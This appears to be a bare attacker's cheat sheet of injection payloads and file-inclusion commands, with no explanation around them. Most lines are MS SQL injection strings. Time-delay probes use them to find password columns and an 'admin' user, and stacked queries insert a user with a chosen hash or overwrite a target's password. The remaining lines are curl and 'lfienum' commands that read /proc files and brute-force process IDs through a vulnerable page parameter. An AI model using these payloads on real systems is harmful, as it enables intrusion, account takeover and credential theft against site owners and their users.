'; IF ((select count(c.name) from sys.columns c, sys.tables t where c.object_id = t.object_id and t.name = 'users' and c.name like 'pass%')=1) WAITFOR DELAY '0:0:10';--

'; IF EXISTS (SELECT 1 FROM sys.columns col JOIN sys.tables tab ON col.object_id = tab.object_id WHERE tab.name = 'users' AND col.name like 'pass%') WAITFOR DELAY '0:0:10';--

'; INSERT INTO users (user_id, username, password_hash) VALUES (3, 'test', '6b3a55e0261b0304143f805a24924d0c1c44524821305f31d9277843b8a10f4e'); WAITFOR DELAY '0:0:5';--

'; INSERT INTO users (user_id, username, password_hash) VALUES (3, 'test', '6b3a55e0261b0304143f805a24924d0c1c44524821305f31d9277843b8a10f4e');--

'; IF EXISTS (SELECT 1 FROM <users_table> WHERE <username_column> like 'bu%') WAITFOR DELAY '0:0:5';--

'; IF EXISTS (SELECT 1 FROM <users_table> WHERE <username_column> = 'admin') WAITFOR DELAY '0:0:5';--

' AND 1=(SELECT CASE WHEN EXISTS (SELECT * FROM users WHERE password_hash = 'some_value') THEN 1 ELSE (SELECT 1/0) END)--

' AND 1=1; UPDATE users SET password_hash = 'newpassword' WHERE username = 'targetuser'--

curl -s http:/url/page?param=/proc/self/cmdline -o- | xxd

lfienum "http://$trgt1/page?param=" --pids 50000 | tee procs.txt

lfienum "http://$trgt1/page?param="

lfienum "http://$trgt1/page?param=" -k

lfienum "http://$trgt1/page?param=" -w lfi_wordlist.txt